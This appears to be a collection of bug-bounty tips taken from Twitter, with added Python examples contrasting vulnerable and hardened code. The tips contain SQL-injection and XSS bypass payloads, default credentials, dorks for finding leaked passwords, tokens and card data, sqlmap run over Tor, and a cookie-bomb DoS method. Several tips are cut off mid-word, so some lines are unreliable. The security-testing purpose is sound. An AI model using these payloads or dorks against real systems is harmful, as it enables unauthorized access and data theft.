Bounty Tips Collected From Twitter

Tip 1

Here's my last finding (P1)
1- register account
2- intercept request
3- here's the response in image, so in the "role" parameter we have ROLE_USER
So I don't know what I can replace it with to privilege my account to admin
4- open source code and look in js files
5- So in js files I used ctrl+F to search for "user_role" and found another value that's called "a
6- so I use match and replace to replace the values
7- boom, privileged my account to an admin account with full control
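The weakness behind this tip is a server that persists whatever "role" value the client submits. The following is an added example, not code from the tweet: a profile-update handler that copies every body field into the account (the bug) beside a hardened one that only accepts allow-listed fields and logs anything else. The session store, account table, field names and tampered body are all constructed for this example.

```python
"""Added example: client-supplied role field written to the account
(vulnerable) versus an allow-listed update that reads the role only
from server-side state (hardened). All state below is constructed."""
import copy
import logging

logging.basicConfig(level=logging.WARNING, format="%(levelname)s %(message)s")

# Constructed server-side state: one ordinary user with an active session.
SESSIONS = {"sess-abc": {"user_id": 42}}
ACCOUNTS = {42: {"name": "alice", "role": "ROLE_USER"}}

# Constructed tampered body: the UI only sends "name", but an intercepting
# proxy can add any field it likes.
TAMPERED_BODY = {"name": "alice", "role": "ROLE_ADMIN"}

# Fields a user may change about their own account (constructed policy).
SELF_SERVICE_FIELDS = frozenset({"name"})


def vulnerable_update(session_cookie: str, body: dict) -> dict:
    """Mass assignment: every field in the body, 'role' included, is persisted."""
    accounts = copy.deepcopy(ACCOUNTS)  # copy so each call starts from clean state
    user_id = SESSIONS[session_cookie]["user_id"]
    accounts[user_id].update(body)
    return accounts[user_id]


def hardened_update(session_cookie: str, body: dict) -> tuple:
    """Only allow-listed fields are copied; unexpected ones are dropped and logged.

    Returns (updated_account, rejected_field_names).
    """
    accounts = copy.deepcopy(ACCOUNTS)
    user_id = SESSIONS[session_cookie]["user_id"]
    rejected = sorted(set(body) - SELF_SERVICE_FIELDS)
    if rejected:
        # Detection hook: a request carrying privileged fields is worth alerting on.
        logging.warning("user %s submitted non-editable fields %s", user_id, rejected)
    for key in SELF_SERVICE_FIELDS & set(body):
        accounts[user_id][key] = body[key]
    return accounts[user_id], rejected


def is_admin(account: dict) -> bool:
    """Authorization reads the role from the stored account, never from the request."""
    return account["role"] == "ROLE_ADMIN"


if __name__ == "__main__":
    print("vulnerable:", vulnerable_update("sess-abc", TAMPERED_BODY))
    print("hardened:  ", hardened_update("sess-abc", TAMPERED_BODY))
```

The allow-list is deliberately a set of editable fields rather than a deny-list of privileged ones, so a new privileged field added later is rejected by default; the warning line gives the SOC a signal that a proxy-modified request reached the backend.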

Tip 3

CloudFront bypass: ">%0D%0A%0D%0A<x '="foo"> Would be interested to know if this is target specific or other CloudFront websites are vulnerabl

Tip 4

1 : Get all the URLs from wayback / Gau
2 : Filter out the js files using httpx
3 : Check manually all the js files, or you can use a nuclei template or use the @trufflesec chrome extens

Tip 5

target.com/wp-config.php => 404 not found
target.com/wp-config.php.… ==> 200 ok and downloaded
wp-config.php.swp ==> 200 ok
after that, if it contains content encoded using hexadecimal, decode it.

Tip 6

try testing for SQLi Authentication Bypass:
username: '--' / "--"
password: '--' / "--"
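The quote-and-comment payloads above only work against a login query that is assembled from strings. As an added example (not from the tweet), the block below shows that query shape beside the parameterized form that treats the same text as data, with a coarse log-review signal for the pattern. The in-memory database, the user row and the password are constructed; real systems compare a password hash, which changes nothing here because the comment removes the password clause entirely.

```python
"""Added example: string-built login query bypassed by a quote plus SQL
comment, beside the bound-parameter version. Database contents are
constructed for this example."""
import sqlite3


def build_db() -> sqlite3.Connection:
    """Constructed users table with a single account."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES ('admin', 'correct-horse')")  # constructed
    return conn


def vulnerable_login(conn: sqlite3.Connection, username: str, password: str) -> bool:
    """String-built query: the username text is interpreted as SQL."""
    query = (
        "SELECT COUNT(*) FROM users "
        f"WHERE username='{username}' AND password='{password}'"
    )
    return conn.execute(query).fetchone()[0] > 0


def hardened_login(conn: sqlite3.Connection, username: str, password: str) -> bool:
    """Bound parameters: the same text is only ever compared as data."""
    query = "SELECT COUNT(*) FROM users WHERE username=? AND password=?"
    return conn.execute(query, (username, password)).fetchone()[0] > 0


def looks_like_auth_bypass_attempt(username: str) -> bool:
    """Coarse signal for log review (not a filter): a quote followed by a SQL comment marker."""
    return any(marker in username for marker in ("'--", '"--', "'#", '"#', "'/*", '"/*'))


if __name__ == "__main__":
    db = build_db()
    # "admin'--" is the page's '-- pattern prefixed with a known username (constructed).
    print("vulnerable:", vulnerable_login(db, "admin'--", "wrong"))
    print("hardened:  ", hardened_login(db, "admin'--", "wrong"))
```

With the string-built query the text after `'--` is a comment, so the password comparison never runs; with bound parameters the whole string is looked up as a literal username and matches nothing.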

Tip 7

default credentials:
PSADMIN:PSADMIN
PS:PS
PSEM:PSEM
Google Dork: intitle:"Oracle+PeopleSoft+Sign-in"
Wrote a nuclei template to test all permutations

Tip 8

nmap -sV -iL host.txt -oN nmap_scan.txt
Wait a few hours
cat nmap_scan.txt | grep open

Tip 9

Xss payload
https://github.com/Aacle/xss_payload
——————————————
Use Nuclei for leaked api.
$ nuclei -t /nuclei-templates/token-spray/ -var token={yourToken}
——————————————
#Scan through #TOR
sqlmap -u "http://target_server/" --tor --tor-type=SOCKS5
——————————————
Tip: always check the company's/organization's employees' GitHub accounts for leaked ghp_ tokens,
and check access to each repo of the main organization
——————————————
bypass alert ==> [alert][0].call(this,1)
——————————————

Tip 10

1_ Go to SHODAN and get the IP
2_ Go to Dirsearch and do fuzzing
3_ Obtain sensitive data

Tip 11

Recon Recon Recon!!
Shodan Dorking Always wins.
ssl:"Company Inc"
Filter results by http title.
Start fuzzing an interesting asset.
Found swagger-ui/
Tried swagger ui xss with
https://github.com/seanmarpo/webjars-swagger-xss

Tip 12

Have you ever heard about wc-db file disclosure?!
> you can check it by:
https://target[.]com/.svn/wc.db
> then you can use this tool to dump all of the website source code
https://github.com/anantshri/svn-extractor

Tip 13

1. Shodan Dork -> Some Assets.
2. Fuzzing & got 403 Forbidden on /config dir.
3. Fuzzing on /config/FUZZ and getting some config files.
4. Same pattern and it works on another asset.

Tip 14

Default Credentials admin:admin - shodan dork: ssl:"target[.]com" 200 http.title:"dashboard"

Tip 15

A quick thread about JIRA misconfiguration that I tried today.
3. Google dorks to find jira dashboards.
inurl:/ConfigurePortalPages!default.jspa?view=popular
4. Google dork to find jira filters page.
inurl:/ManageFilters.jspa?filterView=popular AND ( intext:All users OR intext:Shared with the pub

Tip 16

5. Google dork to find the exposed user list.
inurl:/UserPickerBrowser.jspa -intitle:Login -intitle:Log

Tip 17

GitHub Recon Tip: look for CSV files that have a high chance of containing confidential informati
dork: "org:company extension:csv admin"
leak: "cc number, cvv, email, phone number"

Tip 18

Oneliner for possible Reflected XSS using Nilo, gxss and Dalfox:
cat targets | waybackurls | anew | grep "=" | gf xss | nilo | gxss -p test | dalfox pipe --skip-b

Tip 19

Tip: "GET request for XML not found" changes the request to POST with XXE payload

Tip 20

Extract Juicy Info From AlienVault
for sub in $(cat HOSTS.txt); do gron "https://otx.alienvault.com/otxapi/indicator/hostname/url_li

Tip 21

bypass PHPMYADMIN
phpmyadmin => 301
PHPmyadmin => 200
PHPMYadmin => 200
PHPMYADMIN => 200
phpMYadmin => 200
phpmyAdmin => 200

Tip 22

SVN
1. ./dirsearch.py -u target -e php,html,js,xml -x 500,403
2. found http://url.com/.svn/
3. clone & use https://github.com/anantshri/svn-extractor
4. ./svn-extractor.py --url http://url.com --match database.php
5. result in output dir and just open it

Tip 23

xss in firstname:
==========================
1:- Use https://github.com/Leoid/MatchandReplace
2:- Import to burpsuite match and replace.
3:- Run gospider.
gospider -s url -a -w --sitemap -r -c 100 -d 8 -p http://127.0.0.1:8080
4:- The Blind xss payload will be added automatically by burp and gospider.
Finally:- 4 BLIND XSS REPORTS.

Tip 24

Cookie Bomb
URL that causes the cookie length to exceed request header limits for all requests until the cook
1. Find a Cookie set by a parameter
2. Inject as many commas as you can into the parameter until you DoS that user
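A cookie bomb is only possible when a handler copies a request parameter into Set-Cookie without a size bound. The following added example (not code from the tweet) shows that handler beside a hardened one that bounds length and character set, plus a helper that estimates the Cookie header the browser would send back, so the lock-out effect can be measured in a test. The 8 KB header limit, the cookie name and the sample payload are constructed for this example.

```python
"""Added example: a reflected cookie value with no size bound (vulnerable)
versus a bounded, validated one (hardened), with a helper to estimate the
resulting Cookie request header. Limits and names are constructed."""
import re
from typing import List, Optional

HEADER_LIMIT = 8192          # constructed: a common per-request header size limit
MAX_COOKIE_VALUE = 256       # constructed policy: far below the header limit
SAFE_VALUE = re.compile(r"[A-Za-z0-9_-]*")


def vulnerable_set_cookie(param: str) -> Optional[str]:
    """Echoes the parameter into the cookie unchanged, whatever its size."""
    return f"pref={param}; Path=/"


def hardened_set_cookie(param: str) -> Optional[str]:
    """Refuses over-long or non-token values instead of persisting them."""
    if len(param) > MAX_COOKIE_VALUE or not SAFE_VALUE.fullmatch(param):
        return None  # caller serves defaults and logs the rejection
    return f"pref={param}; Path=/; HttpOnly; SameSite=Lax"


def cookie_header_size(set_cookie_headers: List[Optional[str]]) -> int:
    """Bytes in the Cookie header a browser would send back from these Set-Cookie values."""
    pairs = [h.split(";", 1)[0] for h in set_cookie_headers if h]
    if not pairs:
        return 0
    return len("Cookie: " + "; ".join(pairs))


def is_user_locked_out(set_cookie_headers: List[Optional[str]]) -> bool:
    """True when every later request would be rejected for an over-size header."""
    return cookie_header_size(set_cookie_headers) > HEADER_LIMIT


if __name__ == "__main__":
    bomb = "," * 9000  # constructed payload in the spirit of the tip
    print("vulnerable locked out:", is_user_locked_out([vulnerable_set_cookie(bomb)]))
    print("hardened locked out:  ", is_user_locked_out([hardened_set_cookie(bomb)]))
```

Rejecting the value outright is preferable to truncating it: a truncated value is still attacker-chosen, and the rejection gives the application a clean event to log. A server-side maximum on the Cookie header (returning 431) stops the crash but does not undo the lock-out, so the fix belongs at the point where the cookie is set.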

Tip 25

xss via jwt
1. Make a jwt token and insert an xss payload.
2. The final url is like url/dest?jwt=vulnerable-jwt-token. (The jwt= parameter was decoding the provided jwt token and showing it in the page.)

Tip 26

Getting Private Information URLs by curling
1. Grab all URLs from your target which you think are hard to hunt or test, or static
2. Save all files in any.txt
3. Command: for i in $(cat any.txt); do curl "$i" >> output.txt; done
4. Grep all curled responses for the following keywords: drive.google docs.google /spreadsheets/d/ /document/d/
NOTE: This creates lots of junk, so make sure you perform it in a folder so you can delete it later
You will get URLs including juicy information

Tip 26

Injecting Payload In Phone Numbers field
https://twitter.com/Pwn2arn/status/1609146484263641089

Tip 27

Easy P1 🙃
1: Collect all the Js files by using the developer tools in Mozilla
2: Run the Link Finder tool on the JS files you got from the dev tools, or use the Js Miner tool
3: Now manually check the js files for sensitive keywords

Tip 28

Tips for my last P1:
1 - Found a dev portal for developing that requires Basic Auth
2 - Searched GitHub for "domain" docker
3 - Found a user trying to pull the private repository and passing the username:pass
4 - Decoded the Base64 Basic Auth
5 - Logged in with full access on all Prod

Tip 29

Github leak for Aws, jira, okta etc
1. Org:"target" pwd/pass/passwd/password
2. "target.atlassian" pwd/pass/passwd/password
3. "target.okta" pwd/pass/passwd/password
4. "Jira.target" pwd/pass/passwd/password

Tip 30

sourcemap js
https://blog.prodefense.io/little-bug-big-impact-25k-bounty-9e47773f959f
https://github.com/rarecoil/unwebpack-sourcemap

Tip 31

If a site uses AngularJS, test {{7*7}} to see whether 49 is rendered anywhere. If the application is built with ASP.NET with XSS protection enabled, you might want to focus on testing other vulnerability types first and check for XSS as a last resort.
AngularJS Client-Side Template Injection
https://github.com/tijme/angularjs-csti-scanner?fbclid=IwAR0z3X2XRXRugdCiGSMk_CHVn3-MZU1qFHWKVHXU

Tip 32

If a site is built with Rails, you might know that URLs typically follow a /CONTENT_TYPE/RECORD_ID pattern, where the RECORD_ID is an autoincremented integer. Using HackerOne as an example, report URLs follow the pa www.hackerone.com/reports/12345. Rails applications commonly use integer IDs, so you might priori insecure direct object reference vulnerabilities because this vulnerability type is easy for dev
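Sequential integer IDs are only a problem when the lookup is keyed on the ID alone. As an added example (not code from the post or from HackerOne), the block below shows that lookup beside one that binds the query to the requesting user, plus a helper that measures how many records a single user can read by walking an ID range. The in-memory table, the owner IDs and the report IDs are constructed; 12345 is the ID shape the text quotes, not a real report.

```python
"""Added example: record fetched by sequential id alone (IDOR) versus a
lookup bound to the requester, with a helper that measures enumeration
exposure. Table contents are constructed for this example."""
import sqlite3
from typing import Callable, Optional, Tuple


def build_db() -> sqlite3.Connection:
    """Constructed reports table: two users, one private report each."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE reports (id INTEGER PRIMARY KEY, owner_id INTEGER, title TEXT)")
    conn.executemany(
        "INSERT INTO reports VALUES (?, ?, ?)",
        [(12345, 1, "private report of user 1"), (12346, 2, "private report of user 2")],
    )
    return conn


def vulnerable_get_report(conn: sqlite3.Connection, requester_id: int, report_id: int) -> Optional[Tuple]:
    """Any authenticated user can fetch any id: the requester is never consulted."""
    return conn.execute(
        "SELECT id, owner_id, title FROM reports WHERE id=?", (report_id,)
    ).fetchone()


def hardened_get_report(conn: sqlite3.Connection, requester_id: int, report_id: int) -> Optional[Tuple]:
    """Ownership is part of the query; missing and foreign records look the same (None)."""
    return conn.execute(
        "SELECT id, owner_id, title FROM reports WHERE id=? AND owner_id=?",
        (report_id, requester_id),
    ).fetchone()


def enumeration_hits(conn: sqlite3.Connection, requester_id: int, id_range: range,
                     getter: Callable[..., Optional[Tuple]]) -> int:
    """Measurement aid: how many records one user can read by walking ids in order."""
    return sum(1 for rid in id_range if getter(conn, requester_id, rid) is not None)


if __name__ == "__main__":
    db = build_db()
    print("vulnerable:", enumeration_hits(db, 2, range(12340, 12350), vulnerable_get_report))
    print("hardened:  ", enumeration_hits(db, 2, range(12340, 12350), hardened_get_report))
```

Returning the same "not found" result for both a missing and a foreign record keeps the ID space from leaking which IDs exist. On the detection side, one session producing a run of consecutive-ID requests with mostly not-found responses is the pattern this helper simulates and is worth an alert.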
